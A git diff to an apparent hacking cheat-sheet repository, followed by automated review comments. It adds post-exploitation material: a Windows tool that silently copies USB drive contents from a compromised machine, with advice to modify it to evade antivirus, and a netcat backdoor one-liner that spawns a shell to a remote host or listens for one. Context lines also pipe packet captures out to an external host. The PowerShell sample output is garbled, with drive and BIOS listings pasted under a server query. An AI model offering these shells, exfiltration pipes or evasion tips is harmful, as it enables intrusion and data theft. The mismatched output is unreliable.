diff --git a/bins/windows/index.md b/bins/windows/index.md new file mode 100644 index 0000000..964b81a --- /dev/null +++ b/bins/windows/index.md @@ -0,0 +1,7 @@ +# Useful Windows Binaries + +Useful Windows binary tools that can be used for post exploitation. + +| Tool | Description / Importance | Contributer | +| ----------- | ------------------------ | ----------- | +| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | diff --git a/scripting/bash.md b/scripting/bash.md index 37dd3f3..abf1347 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -89,12 +89,31 @@ grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' tcpdump -w - | nc -v 8.8.8.8 9999 ``` -**Recursively search for files within a directory** +**Recursively search for text contained in files within a directory** ```bash zcat -rf ./* | grep "searchstring" ``` +**Recursively search for files with the specified word within them** +*Submitted by cat on Google Fourms* +```bash +ls -a | find | grep -i "string" +``` + +**Netcat backdoor** +*Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)* +```bash +nc -e /bin/bash *remotecomputer* *port* +OR +nc -e /bin/bash -lp *port* +``` + +**View CPU Information** +```bash +cat /proc/cpuinfo +``` + Credits ----------- -Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions +Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions) 
diff --git a/scripting/powershell.md b/scripting/powershell.md index 94bb7a7..9b655c0 100644 --- a/scripting/powershell.md +++ b/scripting/powershell.md @@ -83,4 +83,51 @@ tingSystem=*Server*))" |select name` * **Output**: *
name
----
PWNT-DC
Exchange1
-SharePoint1
+ Name : C:\
+ DriveType : Fixed
+ DriveFormat : NTFS
+ IsReady : True
+ AvailableFreeSpace : 111111111111
+ TotalFreeSpace : 111111111111
+ TotalSize : 111111111111
+ RootDirectory : C:\
+ VolumeLabel : HP
+
+ Name : D:\
+ DriveType : Fixed
+ DriveFormat : NTFS
+ IsReady : True
+ AvailableFreeSpace : 111111111111
+ TotalFreeSpace : 111111111111
+ TotalSize : 111111111111
+ RootDirectory : D:\
+ VolumeLabel : DATA
+
+ Name : E:\
+ DriveType : CDRom
+ DriveFormat :
+ IsReady : False
+ AvailableFreeSpace :
+ TotalFreeSpace :
+ TotalSize :
+ RootDirectory : E:\
+ VolumeLabel :
+
+ SMBIOSBIOSVersion : 6.0
+ Manufacturer : Phoenix Technologies LTD
+ Name : PheonixBIOS 4.0 Release 6.0
+ SerialNumber : XXXXXXXXXXXXXXXXXXXXXX
+ Version : XXXXXX - XXXXXXX
+
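Review bot: In bins/windows/index.md, the `usbdump.exe` row names a binary but gives no source for it: there is no upstream link, version or checksum in any of the three columns, so a reader cannot verify which build the description refers to. Add a column or a link for the source and a hash of the file. Spelling in the added lines also needs fixing: "Contributer" should be "Contributor", "compromized" should be "compromised", and "usb" should be "USB".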
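Review bot: In scripting/powershell.md, the hunk deletes `SharePoint1` from the sample output of the server query and adds the drive and BIOS listings directly after `Exchange1`, with no heading or command between them in the visible lines. As written, the drive list reads as further output of the `select name` query, and the server list loses an entry. Keep the `SharePoint1` line if its removal was not intended, and put each new listing under its own heading together with the command that produced it. The added BIOS output also spells the name "PheonixBIOS" next to "Phoenix Technologies LTD"; check that line against the real output.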